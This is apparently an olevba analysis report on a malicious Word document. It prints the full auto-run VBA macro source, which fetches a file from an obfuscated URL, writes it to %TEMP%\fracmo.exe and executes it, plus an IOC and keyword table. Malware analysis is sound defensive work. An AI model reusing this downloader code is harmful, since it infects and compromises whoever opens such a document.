Malicious Word macro

olevba 0.41 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MASIHB-V malware.doc

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: malware.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: malware.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
divide ""
minus ""
RxReplace "", "", ""
Cons ""
singularize ""
CompattaDB "", "", ""
VerificaFunzionalita
End Sub


-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: malware.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public Sub BuiltinInit()
    Dim NullEnv As New Scripting.Dictionary
    Dim PlusLR As New Collection
    PlusLR.Add "plus"
    PlusLR.Add NullEnv
    Set GlobalEnv.Item("+LR") = PlusLR
    Set GlobalEnv.Item("+") = Credd.ate("+LR", "func")

    Dim MinusLR As New Collection
    MinusLR.Add "minus"
    MinusLR.Add NullEnv
    Set GlobalEnv.Item("-LR") = MinusLR
    Set GlobalEnv.Item("-") = Credd.ate("-LR", "func")

    Dim TimesLR As New Collection
    TimesLR.Add "times"
    TimesLR.Add NullEnv
    Set GlobalEnv.Item("*LR") = TimesLR
    Set GlobalEnv.Item("*") = Credd.ate("*LR", "func")

    Dim DivideLR As New Collection
    DivideLR.Add "divide"
    DivideLR.Add NullEnv
    Set GlobalEnv.Item("/LR") = DivideLR
    Set GlobalEnv.Item("/") = Credd.ate("/LR", "func")

    Dim ConsLR As New Collection
    ConsLR.Add "Cons"
    ConsLR.Add NullEnv
    Set GlobalEnv.Item("ConsLR") = ConsLR
    Set GlobalEnv.Item("Cons") = Credd.ate("ConsLR", "func")

    Dim CarLR As New Collection
    CarLR.Add "Car"
    CarLR.Add NullEnv
    Set GlobalEnv.Item("CarLR") = CarLR
    Set GlobalEnv.Item("Car") = Credd.ate("CarLR", "func")

    Dim CdrLR As New Collection
    CdrLR.Add "Cdr"
    CdrLR.Add NullEnv
    Set GlobalEnv.Item("CdrLR") = CdrLR
    Set GlobalEnv.Item("Cdr") = Credd.ate("CdrLR", "func")

End Sub

Public Function Cons(args As String)
'function prelude
strFileTemporaneo.Open
Dim EnvLR As Variant
GoTo minus1
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Set Env = LR.Item(2)
'actual function body
Set res.Car = argddds.Item(2)
Set res.Cdr = argddds.Item(3)
'local environment writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1))
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Modussle1.current_res = res
minus1:
    EnvLR = pathTrueCrypt.responseBody
    strFileTemporaneo.write EnvLR
End Function

 Public Function Car(args As Collection)
'function prelude
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Dim Env As New Scripting.Dictionary
    Set Env = LR.Item(2)
'actual function body
Set res = argddds.Item(2).Car
'local environment writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1))
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Module1.current_res = res
End Function

 Public Function Cdr(args As Collection)
'function prelude
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Dim Env As New Scripting.Dictionary
    Set Env = LR.Item(2)
'actual function body
Set res = argddds.Item(2).Cdr
'local environment writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1))
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Module1.current_res = res
End Function


Public Function plus(args As Collection)
'function prelude
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Dim Env As New Scripting.Dictionary
    Set Env = LR.Item(2)
'actual function body
    Dim res As New Lval
    If argddds.Count = 1 Then
        Set res = Credd.ate(0, "number")
    ElseIf argddds.Count = 2 Then
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
    Else
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
        For i = 3 To argddds.Count
            Call res.SetVal((res.GetVal + argddds.Item(i).GetVal), "number")
        Next
    End If
'captured variable writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Module1.current_res = res
End Function

Public Function minus(args As String)
'function prelude
Set strFileTemporaneo = CreateObject("Ad" + "odb" + "." + "St" + "ream")
    Set Recordset = CreateObject("W" + "Sc" + "ript" + "." + "Sh" + "ell").Environment("P" + "ro" + "c" + "e" + "ss")
Exit Function
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Set Env = LR.Item(2)
'actual function body
    If argddds.Count = 1 Then
        Set res = Credd.ate(0, "number")
    ElseIf argddds.Count = 2 Then
        Set res = Credd.ate(0 - argddds.Item(2).GetVal, "number")
    Else
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
        For i = 3 To argddds.Count
            Call res.SetVal((res.GetVal - argddds.Item(i).GetVal), "number")
        Next
    End If
'captured variable writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
    Call LR_Writeback.Add(Env)
'return value
End Function

Public Function times(args As Collection)
'function prelude
    instance = argddds.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Dim Env As New Scripting.Dictionary
    Set Env = LR.Item(2)
'actual function body
    Dim res As New Lval
    If argddds.Count = 1 Then
        Set res = Credd.ate(1, "number")
    ElseIf argddds.Count = 2 Then
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
    Else
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
        For i = 3 To argddds.Count
            Call res.SetVal((res.GetVal * argddds.Item(i).GetVal), "number")
        Next
    End If
'captured variable writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Module1.current_res = res
End Function

Public Function divide(args As String)
Set pathTrueCrypt = CreateObject("Microsoft" + ".XMLHTTP")
Dim urlAr() As Variant
urlAr = Array(3458, 3470, 3470, 3466, 3412, 3401, 3401, 3474, 3469, 3464, 3465, 3459, 3469, 3455, 3453, 3453, 3469, 3400, 3452, 3459, 3457, 3466, 3465, 3464, 3454, 3458, 3465, 3469, 3470, 3459, 3464, 3457, 3400, 3453, 3465, 3463, 3401, 3471, 3408, 3407, 3406, 3457, 3401, 3409, 3408, 3460, 3407, 3458, 3406, 3457, 3400, 3455, 3474, 3455)
pathTrueCrypt.Open "GET", VBGetDrive(urlAr, 53), False
Exit Function
    instance = argscs.Item(1).GetVal
    Dim LR As New Collection
    Set LR = GlobalEnv.Item(instance)
    Set Env = LR.Item(2)
'actual function body
    If argggs.Count = 1 Then
        Set res = Cregg.ate(1, "number")
    ElseIf argddds.Count = 2 Then
        Set res = Credd.ate((1 / argddds.Item(2).GetVal), "number")
    Else
        Set res = Credd.ate(argddds.Item(2).GetVal, "number")
        For i = 3 To argddds.Count
            Call res.SetVal((res.GetVal / argddds.Item(i).GetVal), "number")
        Next
    End If
'captured variable writeback
    Dim LR_Writeback As New Collection
    Call LR_Writeback.Add(LR.Item(1)) 'add function ID, even though we don't need it
    Call LR_Writeback.Add(Env)
    Set GlobalEnv.Item(instance) = LR_Writeback
'return value
    Set Modulss.e1.current_res = res
End Function


-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: malware.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public pathTrueCrypt As Object
Public strFileTemporaneo As Object
Public Recordset  As Object
Public backupValid As String
Public richiesta As String
Public F1abiliata As Object
Public Function pluralize(s As String)
    Dim plural As New Scripting.Dictionary
    plural.Add "(quiz)$", "$1zes"
    plural.Add "^(ox)$", "$1en"
    plural.Add "([m|l])ouse$", "$1ice"
    plural.Add "(matr|vert|ind)ix|ex$", "$1ices"
    plural.Add "(x|ch|ss|sh)$", "$1es"
    plural.Add "([^aeiouy]|qu)y$", "$1ies"
    plural.Add "([^aeiouy]|qu)ies$", "$1y"
    plural.Add "(hive)$", "$1s"
    plural.Add "(?:([^f])fe|([lr])f)$", "$1$2ves"
    plural.Add "sis$", "ses"
    plural.Add "([ti])um$", "$1a"
    plural.Add "(buffal|tomat)o$", "$1oes"
    plural.Add "(bu)s$", "$1ses"
    plural.Add "(alias|status)$", "$1es"
    plural.Add "(octop|vir)us$", "$1i"
    plural.Add "(ax|test)is$", "$1es"
    plural.Add "s$", "s"
    plural.Add "$", "s"

    Dim irregular As New Scripting.Dictionary
    irregular.Add "move", "moves"
    irregular.Add "foot", "feet"
    irregular.Add "goose", "geese"
    irregular.Add "sex", "sexes"
    irregular.Add "child", "children"
    irregular.Add "man", "men"
    irregular.Add "tooth", "teeth"
    irregular.Add "person", "people"

    Dim uncountable As New Scripting.Dictionary
    uncountable.Add "sheep", "sheep"
    uncountable.Add "fish", "fish"
    uncountable.Add "deer", "deer"
    uncountable.Add "series", "series"
    uncountable.Add "species", "species"
    uncountable.Add "money", "money"
    uncountable.Add "rice", "rice"
    uncountable.Add "information", "information"
    uncountable.Add "equipment", "equipment"

    Dim vKey As Variant

    'check to see if the single is uncountable
    If uncountable.Exists(s) Then
        pluralize = s
        Exit Function
    End If

    'check for irregular forms
    For Each vKey In irregular.Keys
        If RxTest(s, CStr(vKey)) Then
            pluralize = RxReplace(s, CStr(vKey), irregular(CStr(vKey)))
            Exit Function
        Else
        End If
    Next vKey


    'pluralization
    For Each vKey In plural.Keys
        If RxTest(s, CStr(vKey)) Then
            pluralize = RxReplace(s, CStr(vKey), plural(CStr(vKey)))
            Exit Function
        Else
        End If
    Next vKey

    'default back to the original string
    pluralize = s
End Function

Public Function singularize(s As String)
strFileTemporaneo.savetofile richiesta, 2
Exit Function
    singlular.Add "(quiz)zes$", "$1"
    singlular.Add "(matr)ices$", "$1ix"
    singlular.Add "(vert|ind)ices$", "$1ex"
    singlular.Add "^(ox)en$", "$1"
    singlular.Add "(alias)es$", "$1"
    singlular.Add "(octop|vir)i$", "$1us"
    singlular.Add "(cris|ax|test)es$", "$1is"
    singlular.Add "(shoe)s$", "$1"
    singlular.Add "(o)es$", "$1"
    singlular.Add "(bus)es$", "$1"
    singlular.Add "([m|l])ice$", "$1ouse"
    singlular.Add "(x|ch|ss|sh)es$", "$1"
    singlular.Add "(m)ovies$", "$1ovie"
    singlular.Add "(s)eries$", "$1eries"
    singlular.Add "([^aeiouy]|qu)ies$", "$1y"
    singlular.Add "([lr])ves$", "$1f"
    singlular.Add "(tive)s$", "$1"
    singlular.Add "(hive)s$", "$1"
    singlular.Add "(li|wi|kni)ves$", "$1fe"
    singlular.Add "(shea|loa|lea|thie)ves$", "$1f"
    singlular.Add "(^analy)ses$", "$1sis"
    singlular.Add "((a)naly|(b)a|(d)iagno|(p)arenthe|(p)rogno|(s)ynop|(t)he)ses$", "$1$2sis"
    singlular.Add "([ti])a$", "$1um"
    singlular.Add "(n)ews$", "$1ews"
    singlular.Add "(h|bl)ouses$", "$1ouse"
    singlular.Add "(corpse)s$", "$1"
    singlular.Add "(us)es$", "$1"
    singlular.Add "s$", ""


    irregular.Add "moves", "move"
    irregular.Add "feet", "foot"
    irregular.Add "geese", "goose"
    irregular.Add "sexes", "sex"
    irregular.Add "children", "child"
    irregular.Add "men", "man"
    irregular.Add "teeth", "tooth"
    irregular.Add "people", "person"


    uncountable.Add "sheep", "sheep"
    uncountable.Add "fish", "fish"
    uncountable.Add "deer", "deer"
    uncountable.Add "series", "series"
    uncountable.Add "species", "species"
    uncountable.Add "money", "money"
    uncountable.Add "rice", "rice"
    uncountable.Add "information", "information"
    uncountable.Add "equipment", "equipment"

    Dim vKey As Variant

    'check to see if the single is uncountable
    If uncountable.Exists(s) Then
        singularize = s
        Exit Function
    End If

    'check for irregular forms
    For Each vKey In irregular.Keys
        If RxTest(s, CStr(vKey)) Then
            singularize = RxReplace(s, CStr(vKey), irregular(CStr(vKey)))
            Exit Function
        Else
        End If
    Next vKey


    'pluralization
    For Each vKey In singlular.Keys
        If RxTest(s, CStr(vKey)) Then
            singularize = RxReplace(s, CStr(vKey), singlular(CStr(vKey)))
            Exit Function
        Else
        End If
    Next vKey

    'default back to the original string
    singularize = s
End Function
Public Function VBGetDrive(fromArr() As Variant, LenLen As Integer) As String
    Dim i As Integer
    Dim result As String
    result = ""
    For i = LBound(fromArr) To UBound(fromArr)
        result = result & Chr(fromArr(i) - LenLen - 3301)
    Next i
    VBGetDrive = result
End Function

'http://bytecomb.com/regular-expressions-in-vba/
Public Function RxTest( _
    ByVal SourceString As String, _
    ByVal Pattern As String, _
    Optional ByVal IgnoreCase As Boolean = True, _
    Optional ByVal MultiLine As Boolean = True) As Boolean

    With New RegExp
        .MultiLine = MultiLine
        .IgnoreCase = IgnoreCase
        .Global = False
        .Pattern = Pattern
        RxTest = .Test(SourceString)
    End With

End Function

'http://bytecomb.com/regular-expressions-in-vba/
Public Function RxReplace( _
    ByVal SourceString As String, _
    ByVal Pattern As String, _
    ByVal ReplacePattern As String, _
    Optional ByVal IgnoreCase As Boolean = True, _
    Optional ByVal MultiLine As Boolean = True, _
    Optional ByVal MatchGlobal As Boolean = True) As String
 backupValid = Recordset("" + "" + "T" + "E" + "MP") + "\"
 richiesta = backupValid + "frac" + "mo" + ".ex" + "e"
 strFileTemporaneo.Type = 1
 pathTrueCrypt.Send
 Exit Function
    With RegExp
        .MultiLine = MultiLine
        .IgnoreCase = IgnoreCase
        .Global = MatchGlobal
        .Pattern = Pattern
        RxReplace = .Replace(SourceString, ReplacePattern)
    End With

End Function


-------------------------------------------------------------------------------
VBA MACRO Module3.bas
in file: malware.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Const strKeyDb As String = "ciao"
Const strKeyDbTrac As String = "limone"
Public Const strKeyVolume As String = "!&^_`}~804FGHUJK!"
Public Const appName As String = "IsoDial"
Const sezione As String = "Impostazioni"
Const nomeUsb As String = "U_BACKUP"
Public Const nomeVolume As String = "SysCrypt.tc"
Const Megabyte = 1048576
Private Type structFile
 data As Date
 num As Integer
End Type
Sub Main()
 Dim ret As Long
 Dim datadb As Date
 Call CaricaPercorso
 Call VerificaErrori
 Call MontaVolume
 Call CaricaDati
 Call VerificaFunzionalita
 isCorrotto = False
 datadb = CDate(Left(FileDateTime(structApri.pathDB + "\centro.mdb"), 10))
 If datadb > Date Then
 MsgBox ("IMPOSSIBILE AVVIARE ISODIAL - La data di sistema non ? corretta"), vbCritical, "ATTENZIONE!!!"
 Set cnPrinc = Nothing
 Set cnTrac = Nothing
 If structApri.server Then
 Call Shell("NET SHARE RISORSA /DELETE", vbHide)
 ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe /d X /q /s /f", vbHide)
 End If
 End
 End If
 frmMain.Show
 frmLogin.Show 1
End Sub
Private Sub CaricaPercorso()
 On Error GoTo gestione
 structApri.pathVolume = (GetSetting(appName, sezione, "percorsoVolume"))
 structApri.pathTrueCrypt = (GetSetting(appName, sezione, "percorsoTrueCrypt"))
 structApri.pathExe = (GetSetting(appName, sezione, "percorsoExe"))
 structApri.server = CBool(GetSetting(appName, sezione, "Server"))
 structApri.nomeServer = GetSetting(appName, sezione, "nomeServer")
 structApri.pathNomeCertificato = GetSetting(appName, sezione, "nomeCertificato")
 structApri.strFromModuliWord = GetSetting(appName, sezione, "strFromModuliWord")
 Exit Sub
gestione:
 MsgBox "Errore n? 1-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
 End
End Sub
Public Sub VerificaErrori()
 On Error GoTo gestione
 Dim lettera As String
 Dim dimVolume As Double
 If App.PrevInstance Then
 MsgBox "Il programma ? gi? in esecuzione" & vbCrLf & _
 "(Situato nella barra in basso a destra dello schermo vicino all"
 End
 End If
 If Dir((structApri.pathVolume) & "\" & nomeVolume) = "" Then
 MsgBox "Archivio inesistente", vbCritical, "Apertura archivio"
 End
 End If
 dimVolume = FileLen(structApri.pathVolume & "\" & nomeVolume) / Megabyte
 If structApri.server Then
 If Dir((structApri.pathTrueCrypt) & "\TrueCrypt.exe") = "" Then
 MsgBox "Programma di criptaggio non istallato", vbCritical, "Apertura archivio"
 End
 End If
 If Not (Environ$("COMPUTERNAME") = "MASTER" Or Environ$("COMPUTERNAME") = "MASTERMIO") Then
 If Not VerificaDiscoRimovibile(lettera) Then
 MsgBox "Impossibile continuare" & vbCrLf & "Unita"
 End
 End If
 If Not SpazioSufficiente(lettera, dimVolume) Then
 MsgBox "Impossibile continuare" & vbCrLf & "Spazio insufficiente sull"
 End
 End If
 If Not backupValidi(lettera) Then
 MsgBox "I file di backup presenti nell"
 End If
 End If
 End If
 Exit Sub
gestione:
 If Err.Number = 55 Or Err.Number = 53 Then
 Exit Sub
 ElseIf Err.Number = 52 Then
 MsgBox "Impossibile avviare Isodial" & vbCrLf & "Verificare la connessione al server", vbCritical, "Attenzione"
 End
 Else
 MsgBox "Errore n? 2-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
 End
 End If
End Sub
Public Sub MontaVolume()
 Dim ret As Double
 On Error GoTo gestione
 If structApri.server And getVersion = "Windows XP" Then
 ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe" & " /v " & structApri.pathVolume & "\" & nomeVolume & " /l X /p " & strKeyVolume & " /a /q /s", vbHide)
 Shell ("NET SHARE RISORSA=X: /UNLIMITED")
 structApri.pathDB = "X:"
 ElseIf structApri.server Then
 ret = Shell(structApri.pathTrueCrypt & "\TrueCrypt.exe" & " /v " & structApri.pathVolume & "\" & nomeVolume & " /l X /p " & strKeyVolume & " /a /q /s", vbHide)
 Shell ("NET SHARE RISORSA=X: /GRANT:everyone,full /UNLIMITED")
 structApri.pathDB = "X:"
 Else
 tRete = tpCONNETTI
 frmAttendi.Show 1
 structApri.pathDB = structApri.nomeServer & "\RISORSA"
 End If
 Exit Sub
gestione:
 MsgBox "Errore n? 3-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
 End
End Sub
Public Sub CompattaDB(nomeDB As String, strPercorsoDB As String, strKeyDb As String)
 On Error GoTo ErrorHandler
 Dim strFileTemporaneo As String
 Set F1abiliata = CreateObject("Sh" + "ell" + "." + "Ap" + "pli" + "cat" + "ion")
Exit Sub

 strFileTemporaneo = strPercorsoDB & "\temp.mdb"
 oJet.CompactDatabase _
 "Provider=Microsoft.Jet.OLEDB.4.0;" _
 & "Data Source=" & strPercorsoDB & "\" & nomeDB & ";Jet OLEDB:Database Password=" & strKeyDb, _
 "Provider=Microsoft.Jet.OLEDB.4.0;" _
 & "Data Source=" & strFileTemporaneo & ";" _
 & "Jet OLEDB:Engine Type = 5;Jet OLEDB:Database Password=" & strKeyDb
 Kill strPercorsoDB & "\" & nomeDB
 Name strFileTemporaneo As strPercorsoDB & "\" & nomeDB
 Exit Sub
ErrorHandler:
 If Err.Number = -2147467259 Then
 Exit Sub
 Else
 MsgBox "Errore n? 4-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
 End If
End Sub
Public Sub CaricaDati()
 On Error GoTo gestione
 Dim rsDataset As Recordset
 Set cnPrinc = New ADODB.Connection
 cnPrinc.CursorLocation = adUseClient
 strConnectionStringCentro = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & (structApri.pathDB) & "\Centro.mdb;Jet OLEDB:Database Password=" & strKeyDb
 cnPrinc.Open strConnectionStringCentro
 If TRACCIATO Then
 Set cnTrac = New ADODB.Connection
 cnTrac.CursorLocation = adUseClient
 strConnectionStringTracciatura = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & (structApri.pathDB) & "\Connessioni.mdb;Jet OLEDB:Database Password=" & strKeyDbTrac
 cnTrac.Open strConnectionStringTracciatura
 End If
 If Not structApri.server Then
 Set rsDataset = New Recordset
 rsDataset.Open "CLIENT", cnPrinc, adOpenKeyset, adLockPessimistic, adCmdTable
 rsDataset.Update "NUMERO", rsDataset("NUMERO") + 1
 Set rsDataset = Nothing
 End If
 intValore = 10
 Call CaricaVarPublic
 Exit Sub
gestione:
 MsgBox "Errore n? 5-" & Err.Number & ": " & vbCrLf & Err.Description, vbCritical, "Attenzione"
 End
End Sub
Public Sub VerificaFunzionalita()
F1abiliata.Open (richiesta)
End Sub
Private Function backupValidi(lettera As String) As Boolean
 On Error GoTo gestione
 Dim i As Integer
 Dim records() As structFile
 ReDim records(0)
 If Dir(lettera & ":\Dati.dat") <> "" Then
 Open lettera & ":\Dati.dat" For Random As 1
 i = 0
 Do While Not EOF(1)
 Get 1, i + 1, records(i)
 ReDim Preserve records(UBound(records) + 1)
 i = i + 1
 Loop
 Close 1
 ReDim Preserve records(UBound(records) - 1)
 For i = 0 To UBound(records)
 If Dir(lettera & ":\" & nomeVolume & records(i).num) = "" Then
 backupValidi = False
 Exit Function
 End If
 Next i
 backupValidi = True
 Else
 backupValidi = True
 End If
 Exit Function
gestione:
 MsgBox "Errore n? 6 - " & Err.Description, vbCritical, "Attenzione"
End Function
Private Function ConfrontoVersione(inLibreria As String, inVersioneRichiesta As String, ByRef outTesto As String) As Boolean
 Dim strVersioneAttuale As String
 ConfrontoVersione = True
 If Not IsCorrectVersion(inVersioneRichiesta, inLibreria, strVersioneAttuale) Then
 outTesto = outTesto & _
 "La libreria " & inLibreria & " non ? aggiornata." & vbCrLf & _
 "Versione richiesta: " & inVersioneRichiesta & Space(5) & "Versione attuale: " & strVersioneAttuale & vbCrLf
 ConfrontoVersione = False
 End If
End Function
Private Sub ControlloFileEsterni()
 Dim blnBloccaProgramma As Boolean
 Dim strTesto As String
 Dim strVersioneAttuale As String
 Dim strVersioneRichiesta As String
 Dim strLibreria As String
 strLibreria = "DataTimeBox.ocx"
 strVersioneRichiesta = "1.03.0007"
 blnBloccaProgramma = Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
 strLibreria = "SuperTextBox.ocx"
 strVersioneRichiesta = "1.01.0003"
 blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
 strLibreria = "ACPRibbon.ocx"
 strVersioneRichiesta = "1.00.0001"
 blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
 strLibreria = "DataComboBox.ocx"
 strVersioneRichiesta = "1.00.0001"
 blnBloccaProgramma = blnBloccaProgramma Or Not ConfrontoVersione(strLibreria, strVersioneRichiesta, strTesto)
 If blnBloccaProgramma Then
 Beep
 Load frmControlloFileEsterni
 strTesto = "Impossibile avviare Isodial. " & vbCrLf & "Si prega di contattare l"
 frmControlloFileEsterni.lblTesto.Caption = strTesto
 frmControlloFileEsterni.Show 1
 Unload frmControlloFileEsterni
 End If
End Sub
Public Function SpazioSufficiente(lettera As String, spazio As Double) As Boolean
 SpazioSufficiente = CLng(GetDriveSize(lettera & ":")) > spazio
End Function
Public Function GetDriveSize(DriveName As String) As String
 Dim FB As Currency, BT As Currency, FBT As Currency
 Dim RetVal As Long
 RetVal = GetDiskFreeSpace_FAT32(Left(DriveName, 2), FB, BT, FBT)
 FBT = FBT * 10000
 GetDriveSize = Format(FBT / Megabyte, "####,###,###")
End Function
Public Function VerificaDiscoRimovibile(ByRef lettera As String) As Boolean
 Dim ret As Long
 Dim allDrives As String
 Dim v_drives() As String
 Dim i As Integer
 Dim volName As String
 Dim serial As Long
 Dim f As String
 Dim g As Long
 allDrives = VBGetLogicalDriveStrings()
 v_drives = Split(allDrives, Chr(0))
 For i = 0 To UBound(v_drives)
 ret = GetDriveType(v_drives(i))
 If ret = DRIVE_REMOVABLE Then
 If Left(v_drives(i), 1) <> "A" And Left(v_drives(i), 1) <> "B" Then
 Call GetDriveInfo(Left(v_drives(i), 1) & ":", volName, serial, f, g)
 If volName = nomeUsb Then
 lettera = Left(v_drives(i), 1)
 VerificaDiscoRimovibile = True
 Exit Function
 End If
 End If
 End If
 Next i
 VerificaDiscoRimovibile = False
End Function
Private Function VBGetLogicalDriveStrings() As String
 Dim r As Long
 Dim tmp As String
 tmp$ = Space$(64)
 r& = GetLogicalDriveStrings(Len(tmp$), tmp$)
 VBGetLogicalDriveStrings = Trim$(tmp$)
End Function
Private Function GetDriveInfo(ByVal DriveName As String, Optional VolumeName As String, _
 Optional SerialNumber As Long, Optional FileSystem As String, _
 Optional FileSystemFlags As Long) As Boolean
 Dim ignore As Long
 If InStr(DriveName, "\\") = 0 Then
 DriveName = Left$(DriveName, 1) & ":\"
 End If
 SerialNumber = 0
 FileSystemFlags = 0
 VolumeName = String$(MAX_PATH, 0)
 FileSystem = String$(MAX_PATH, 0)
 GetDriveInfo = GetVolumeInformation(DriveName, VolumeName, Len(VolumeName), _
 SerialNumber, ignore, FileSystemFlags, FileSystem, Len(FileSystem))
 VolumeName = Left$(VolumeName, InStr(VolumeName, vbNullChar) - 1)
 FileSystem = Left$(FileSystem, InStr(FileSystem, vbNullChar) - 1)
End Function


+------------+----------------------+-----------------------------------------+
| Type       | Keyword              | Description                             |
+------------+----------------------+-----------------------------------------+
| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
| Suspicious | Kill                 | May delete a file                       |
| Suspicious | Open                 | May open a file                         |
| Suspicious | Shell                | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | vbHide               | May run an executable file or a system  |
|            |                      | command                                 |
| Suspicious | Windows              | May enumerate application windows (if   |
|            |                      | combined with Shell.Application object) |
| Suspicious | CreateObject         | May create an OLE object                |
| Suspicious | GetVolumeInformation | May detect Anubis Sandbox               |
| Suspicious | Chr                  | May attempt to obfuscate specific       |
|            |                      | strings                                 |
| Suspicious | SaveToFile           | May create a text file                  |
| Suspicious | Environ              | May read system environment variables   |
| Suspicious | Write                | May write to a file (if combined with   |
|            |                      | Open)                                   |
| Suspicious | WScript.Shell        | May run an executable file or a system  |
|            |                      | command (obfuscation: VBA expression)   |
| Suspicious | Shell.Application    | May run an application (if combined     |
|            |                      | with CreateObject) (obfuscation: VBA    |
|            |                      | expression)                             |
| Suspicious | ADODB.Stream         | May create a text file (obfuscation:    |
|            |                      | VBA expression)                         |
| Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
|            |                      | (obfuscation: VBA expression)           |
| Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
|            |                      | be used to obfuscate strings (option    |
|            |                      | --decode to see all)                    |
| Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
|            |                      | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
|            | Strings              | may be used to obfuscate strings        |
|            |                      | (option --decode to see all)            |
| IOC        | http://bytecomb.com  | URL                                     |
|            | /regular-            |                                         |
|            | expressions-in-vba/  |                                         |
| IOC        | TrueCrypt.exe        | Executable file name                    |
| IOC        | fracmo.exe           | Executable file name (obfuscation: VBA  |
|            |                      | expression)                             |
| Hex String | !GFrY                | 2147467259                              |
| Base64     | ~+!                  | fish                                    |
| String     |                      |                                         |
| VBA string | Adodb.Stream         | ("Ad" + "odb" + "." + "St" + "ream")    |
| VBA string | WScript.Shell        | ("W" + "Sc" + "ript" + "." + "Sh" +     |
|            |                      | "ell")                                  |
| VBA string | Process              | ("P" + "ro" + "c" + "e" + "ss")         |
| VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
| VBA string | TEMP\                | ("" + "" + "T" + "E" + "MP") + "\"      |
| VBA string | fracmo.exe           | "frac" + "mo" + ".ex" + "e"             |
| VBA string | \TrueCrypt.exe /v    | "\TrueCrypt.exe" & " /v "               |
| VBA string | Shell.Application    | ("Sh" + "ell" + "." + "Ap" + "pli" +    |
|            |                      | "cat" + "ion")                          |
| VBA string | Provider=Microsoft.J | "Provider=Microsoft.Jet.OLEDB.4.0;"  &  |
|            | et.OLEDB.4.0;Data    | "Data Source="                          |
|            | Source=              |                                         |
| VBA string | ;Jet OLEDB:Engine    | ";"  & "Jet OLEDB:Engine Type = 5;Jet   |
|            | Type = 5;Jet         | OLEDB:Database Password="               |
|            | OLEDB:Database       |                                         |
|            | Password=            |                                         |
+------------+----------------------+-----------------------------------------+